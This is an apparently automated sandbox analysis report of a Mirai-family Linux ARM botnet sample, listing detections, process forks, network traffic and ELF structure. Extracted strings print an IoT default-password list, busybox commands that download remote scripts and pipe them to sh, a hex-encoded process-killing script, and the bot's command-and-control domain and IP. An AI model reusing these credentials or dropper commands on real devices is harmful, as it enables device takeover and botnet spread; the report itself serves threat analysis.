Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm7.elf

Overview

General Information

Sample name:arm7.elf
Analysis ID:1540477
MD5:6c8a7552167d79faf460954c9aa828c1
SHA1:1078f0c98fff6f1c893a7738d78747d3b92facbb
SHA256:04e95cea42bebe788483455666582ac01e479ffc4c0c8e31395820d23689d30b
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1540477
Start date and time:2024-10-23 20:12:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm7.elf
Detection:MAL
Classification:mal60.troj.linELF@0/0@1/0
  • VT rate limit hit for: arm7.elf
Command:/tmp/arm7.elf
PID:6216
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB lEarNs nOthinG xd
Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • arm7.elf (PID: 6216, Parent: 6136, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm7.elf
    • arm7.elf New Fork (PID: 6218, Parent: 6216)
    • arm7.elf New Fork (PID: 6238, Parent: 6216)
      • arm7.elf New Fork (PID: 6241, Parent: 6238)
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: arm7.elfAvira: detected
Source: arm7.elfReversingLabs: Detection: 36%
Source: arm7.elfString: ash|login|wget|curl|tftp|ntpdate
Source: arm7.elfString: /proc//exe|ash|login|wget|curl|tftp|ntpdate/fd/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc/self/exe/. /proc//maps/lib//dev/watchdog/dev/misc/watchdogtelnetd|udhcpc|ntpclient|boa|httpd|mini_http|watchdog|pppdM
Source: arm7.elfString: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4

Networking

barindex
Source: global trafficTCP traffic: 103.253.147.242 ports 1,2,5,6,7,27651
Source: global trafficTCP traffic: 192.168.2.23:53876 -> 103.253.147.242:27651
Source: /tmp/arm7.elf (PID: 6216)Socket: 127.0.0.1:1234Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownUDP traffic detected without corresponding DNS query: 161.97.219.84
Source: global trafficDNS traffic detected: DNS query: 21savage.dyn
Source: arm7.elfString found in binary or memory: http:///curl.sh
Source: arm7.elfString found in binary or memory: http:///wget.sh
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sampleString containing 'busybox' found: usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sampleString containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/0@1/0
Source: /tmp/arm7.elf (PID: 6216)File opened: /proc/11/mapsJump to behavior
Source: /tmp/arm7.elf (PID: 6216)File opened: /proc/22/mapsJump to behavior
Source: /tmp/arm7.elf (PID: 6216)File opened: /proc/66/mapsJump to behavior
Source: /tmp/arm7.elf (PID: 6216)File opened: /proc/99/mapsJump to behavior
Source: /tmp/arm7.elf (PID: 6216)File opened: /proc/111/mapsJump to behavior
Source: /tmp/arm7.elf (PID: 6216)File opened: /proc/222/mapsJump to behavior
Source: /tmp/arm7.elf (PID: 6216)File opened: /proc/333/mapsJump to behavior
Source: /tmp/arm7.elf (PID: 6216)File opened: /proc/777/mapsJump to behavior
Source: submitted sampleStderr: qemu: uncaught target signal 11 (Segmentation fault) - core dumped: exit code = 0
Source: /tmp/arm7.elf (PID: 6216)Queries kernel information via 'uname': Jump to behavior
Source: arm7.elf, 6216.1.00007fff5fbef000.00007fff5fc10000.rw-.sdmp, arm7.elf, 6218.1.00007fff5fbef000.00007fff5fc10000.rw-.sdmp, arm7.elf, 6241.1.00007fff5fbef000.00007fff5fc10000.rw-.sdmpBinary or memory string: m`x86_64/usr/bin/qemu-arm/tmp/arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm7.elf
Source: arm7.elf, 6216.1.0000556fd9cbe000.0000556fd9e0d000.rw-.sdmp, arm7.elf, 6218.1.0000556fd9cbe000.0000556fd9e0d000.rw-.sdmp, arm7.elf, 6241.1.0000556fd9cbe000.0000556fd9e0d000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm7.elf, 6216.1.00007fff5fbef000.00007fff5fc10000.rw-.sdmp, arm7.elf, 6218.1.00007fff5fbef000.00007fff5fc10000.rw-.sdmp, arm7.elf, 6241.1.00007fff5fbef000.00007fff5fc10000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm7.elf, 6216.1.0000556fd9cbe000.0000556fd9e0d000.rw-.sdmp, arm7.elf, 6218.1.0000556fd9cbe000.0000556fd9e0d000.rw-.sdmp, arm7.elf, 6241.1.0000556fd9cbe000.0000556fd9e0d000.rw-.sdmpBinary or memory string: oU!/etc/qemu-binfmt/arm
Source: arm7.elf, 6218.1.00007fff5fbef000.00007fff5fc10000.rw-.sdmp, arm7.elf, 6241.1.00007fff5fbef000.00007fff5fc10000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path InterceptionDirect Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540477 Sample: arm7.elf Startdate: 23/10/2024 Architecture: LINUX Score: 60 16 103.253.147.242, 27651, 53876 DIGITALOCEAN-ASNUS Singapore 2->16 18 109.202.202.202, 80 INIT7CH Switzerland 2->18 20 3 other IPs or domains 2->20 22 Antivirus / Scanner detection for submitted sample 2->22 24 Multi AV Scanner detection for submitted file 2->24 26 Connects to many ports of the same IP (likely port scanning) 2->26 8 arm7.elf 2->8         started        signatures3 process4 process5 10 arm7.elf 8->10         started        12 arm7.elf 8->12         started        process6 14 arm7.elf 10->14         started       
SourceDetectionScannerLabelLink
arm7.elf37%ReversingLabsLinux.Backdoor.Mirai
arm7.elf100%AviraLINUX/GM.Mirai.LV
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
21savage.dyn
156.244.19.135
truefalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http:///wget.sharm7.elffalse
      unknown
      http:///curl.sharm7.elffalse
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        103.253.147.242
        unknownSingapore
        14061DIGITALOCEAN-ASNUStrue
        109.202.202.202
        unknownSwitzerland
        13030INIT7CHfalse
        91.189.91.43
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        91.189.91.42
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        103.253.147.242la.bot.arm7.elfGet hashmaliciousUnknownBrowse
          la.bot.arm7.elfGet hashmaliciousUnknownBrowse
            la.bot.arm7.elfGet hashmaliciousUnknownBrowse
              la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                    la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                        la.bot.mips.elfGet hashmaliciousUnknownBrowse
                          earm5.elfGet hashmaliciousUnknownBrowse
                            109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                            • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                            91.189.91.43la.bot.arc.elfGet hashmaliciousMiraiBrowse
                              la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                .i.elfGet hashmaliciousUnknownBrowse
                                  i.elfGet hashmaliciousUnknownBrowse
                                    mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                      x86_64.elfGet hashmaliciousOkiruBrowse
                                        mips.elfGet hashmaliciousUnknownBrowse
                                          x86.elfGet hashmaliciousUnknownBrowse
                                            .i.elfGet hashmaliciousUnknownBrowse
                                              na.elfGet hashmaliciousUnknownBrowse
                                                91.189.91.42la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                  la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                    .i.elfGet hashmaliciousUnknownBrowse
                                                      i.elfGet hashmaliciousUnknownBrowse
                                                        mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                          x86_64.elfGet hashmaliciousOkiruBrowse
                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                .i.elfGet hashmaliciousUnknownBrowse
                                                                  na.elfGet hashmaliciousUnknownBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    21savage.dynla.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                    • 156.244.19.135
                                                                    la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 156.244.19.135
                                                                    la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                    • 103.253.147.242
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CANONICAL-ASGBla.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                                    • 91.189.91.42
                                                                    la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.189.91.42
                                                                    .i.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.189.91.42
                                                                    i.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.189.91.42
                                                                    sshd.elfGet hashmaliciousUnknownBrowse
                                                                    • 185.125.190.26
                                                                    pozY1lq94j.elfGet hashmaliciousOkiruBrowse
                                                                    • 185.125.190.26
                                                                    mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 91.189.91.42
                                                                    x86_64.elfGet hashmaliciousOkiruBrowse
                                                                    • 91.189.91.42
                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.189.91.42
                                                                    arm4.elfGet hashmaliciousUnknownBrowse
                                                                    • 185.125.190.26
                                                                    CANONICAL-ASGBla.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                                    • 91.189.91.42
                                                                    la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.189.91.42
                                                                    .i.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.189.91.42
                                                                    i.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.189.91.42
                                                                    sshd.elfGet hashmaliciousUnknownBrowse
                                                                    • 185.125.190.26
                                                                    pozY1lq94j.elfGet hashmaliciousOkiruBrowse
                                                                    • 185.125.190.26
                                                                    mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 91.189.91.42
                                                                    x86_64.elfGet hashmaliciousOkiruBrowse
                                                                    • 91.189.91.42
                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.189.91.42
                                                                    arm4.elfGet hashmaliciousUnknownBrowse
                                                                    • 185.125.190.26
                                                                    INIT7CHla.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                                    • 109.202.202.202
                                                                    la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    .i.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    i.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 109.202.202.202
                                                                    x86_64.elfGet hashmaliciousOkiruBrowse
                                                                    • 109.202.202.202
                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    .i.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    na.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    DIGITALOCEAN-ASNUSmpsl.elfGet hashmaliciousUnknownBrowse
                                                                    • 134.123.13.191
                                                                    la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                    • 45.55.98.204
                                                                    la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                    • 103.253.147.242
                                                                    P1 BOL.exeGet hashmaliciousUnknownBrowse
                                                                    • 167.172.133.32
                                                                    https://t.ly/cI3TmGet hashmaliciousUnknownBrowse
                                                                    • 198.199.109.95
                                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                                    • 157.245.2.227
                                                                    https://netorg11230081-my.sharepoint.com/:f:/g/personal/info_onafastpacecontracting_com/Eoa77Lo8BXlOut3qDNQUDAQBBgmgCvIALxhAXrlqjk9Asw?e=2UKAY6Get hashmaliciousUnknownBrowse
                                                                    • 167.71.6.138
                                                                    la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                    • 167.71.53.96
                                                                    la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                    • 167.174.11.231
                                                                    Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                                                                    • 167.172.133.32
                                                                    No context
                                                                    No context
                                                                    No created / dropped files found
                                                                    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                    Entropy (8bit):6.069835768443227
                                                                    TrID:
                                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                    File name:arm7.elf
                                                                    File size:93'728 bytes
                                                                    MD5:6c8a7552167d79faf460954c9aa828c1
                                                                    SHA1:1078f0c98fff6f1c893a7738d78747d3b92facbb
                                                                    SHA256:04e95cea42bebe788483455666582ac01e479ffc4c0c8e31395820d23689d30b
                                                                    SHA512:c2f044369b5d96c08773a75bef14bcd7f04370ed1c026045446c4ccda3e82e4d3e1aed567b39185b4238b4cc29cfb13f0ca123c6971067ca736c15245f849805
                                                                    SSDEEP:1536:Yznzl4fv1xwvtVNzP7E87MoFP4dJ7rKS5MSUQwGqwo9Ol2l5wimZxDv9nzsT:a+v1xwvtXPrMAP4T3KSNUQwGqwot0Zx1
                                                                    TLSH:0393E64AF8819F16D5D815BEFE0E528D332367A8E3DF7203DD246B2527CA55B0A7B401
                                                                    File Content Preview:.ELF..............(.........4....k......4. ...(........p.f...........................................g...g...............g...g...g..t....s...............g...g...g..................Q.td..................................-...L..................@-.,@...0....S

                                                                    ELF header

                                                                    Class:ELF32
                                                                    Data:2's complement, little endian
                                                                    Version:1 (current)
                                                                    Machine:ARM
                                                                    Version Number:0x1
                                                                    Type:EXEC (Executable file)
                                                                    OS/ABI:UNIX - System V
                                                                    ABI Version:0
                                                                    Entry Point Address:0x8194
                                                                    Flags:0x4000002
                                                                    ELF Header Size:52
                                                                    Program Header Offset:52
                                                                    Program Header Size:32
                                                                    Number of Program Headers:5
                                                                    Section Header Offset:93128
                                                                    Section Header Size:40
                                                                    Number of Section Headers:15
                                                                    Header String Table Index:14
                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                    NULL0x00x00x00x00x0000
                                                                    .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                    .textPROGBITS0x80f00xf00x146a00x00x6AX0016
                                                                    .finiPROGBITS0x1c7900x147900x100x00x6AX004
                                                                    .rodataPROGBITS0x1c7a00x147a00x1f100x00x2A004
                                                                    .ARM.extabPROGBITS0x1e6b00x166b00x180x00x2A004
                                                                    .ARM.exidxARM_EXIDX0x1e6c80x166c80x1180x00x82AL204
                                                                    .eh_framePROGBITS0x267e00x167e00x40x00x3WA004
                                                                    .tbssNOBITS0x267e40x167e40x80x00x403WAT004
                                                                    .init_arrayINIT_ARRAY0x267e40x167e40x40x00x3WA004
                                                                    .fini_arrayFINI_ARRAY0x267e80x167e80x40x00x3WA004
                                                                    .gotPROGBITS0x267f00x167f00xa80x40x3WA004
                                                                    .dataPROGBITS0x268980x168980x2bc0x00x3WA004
                                                                    .bssNOBITS0x26b540x16b540x70340x00x3WA004
                                                                    .shstrtabSTRTAB0x00x16b540x730x00x0001
                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                    EXIDX0x166c80x1e6c80x1e6c80x1180x1184.47800x4R 0x4.ARM.exidx
                                                                    LOAD0x00x80000x80000x167e00x167e06.08350x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                    LOAD0x167e00x267e00x267e00x3740x73a84.37580x6RW 0x8000.eh_frame .tbss .init_array .fini_array .got .data .bss
                                                                    TLS0x167e40x267e40x267e40x00x80.00000x4R 0x4.tbss
                                                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 23, 2024 20:12:49.067832947 CEST5387627651192.168.2.23103.253.147.242
                                                                    Oct 23, 2024 20:12:49.073416948 CEST2765153876103.253.147.242192.168.2.23
                                                                    Oct 23, 2024 20:12:49.073484898 CEST5387627651192.168.2.23103.253.147.242
                                                                    Oct 23, 2024 20:12:49.074079990 CEST5387627651192.168.2.23103.253.147.242
                                                                    Oct 23, 2024 20:12:49.079500914 CEST2765153876103.253.147.242192.168.2.23
                                                                    Oct 23, 2024 20:12:52.257519960 CEST42836443192.168.2.2391.189.91.43
                                                                    Oct 23, 2024 20:12:52.543968916 CEST2765153876103.253.147.242192.168.2.23
                                                                    Oct 23, 2024 20:12:52.544365883 CEST5387627651192.168.2.23103.253.147.242
                                                                    Oct 23, 2024 20:12:53.025269032 CEST4251680192.168.2.23109.202.202.202
                                                                    Oct 23, 2024 20:13:07.557769060 CEST5387627651192.168.2.23103.253.147.242
                                                                    Oct 23, 2024 20:13:07.563234091 CEST2765153876103.253.147.242192.168.2.23
                                                                    Oct 23, 2024 20:13:07.615258932 CEST43928443192.168.2.2391.189.91.42
                                                                    Oct 23, 2024 20:13:17.854135036 CEST42836443192.168.2.2391.189.91.43
                                                                    Oct 23, 2024 20:13:23.997174978 CEST4251680192.168.2.23109.202.202.202
                                                                    Oct 23, 2024 20:13:48.569575071 CEST43928443192.168.2.2391.189.91.42
                                                                    Oct 23, 2024 20:14:09.047189951 CEST42836443192.168.2.2391.189.91.43
                                                                    Oct 23, 2024 20:14:17.145771980 CEST2765153876103.253.147.242192.168.2.23
                                                                    Oct 23, 2024 20:14:17.145983934 CEST5387627651192.168.2.23103.253.147.242
                                                                    Oct 23, 2024 20:14:47.172099113 CEST5387627651192.168.2.23103.253.147.242
                                                                    Oct 23, 2024 20:14:47.178360939 CEST2765153876103.253.147.242192.168.2.23
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 23, 2024 20:12:48.875339031 CEST3741653192.168.2.23161.97.219.84
                                                                    Oct 23, 2024 20:12:49.066031933 CEST5337416161.97.219.84192.168.2.23
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Oct 23, 2024 20:12:48.875339031 CEST192.168.2.23161.97.219.840x2915Standard query (0)21savage.dynA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Oct 23, 2024 20:12:49.066031933 CEST161.97.219.84192.168.2.230x2915No error (0)21savage.dyn156.244.19.135A (IP address)IN (0x0001)false
                                                                    Oct 23, 2024 20:12:49.066031933 CEST161.97.219.84192.168.2.230x2915No error (0)21savage.dyn103.253.147.242A (IP address)IN (0x0001)false

                                                                    System Behavior

                                                                    Start time (UTC):18:12:47
                                                                    Start date (UTC):23/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:/tmp/arm7.elf
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Start time (UTC):18:12:48
                                                                    Start date (UTC):23/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Start time (UTC):18:12:48
                                                                    Start date (UTC):23/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Start time (UTC):18:12:48
                                                                    Start date (UTC):23/10/2024
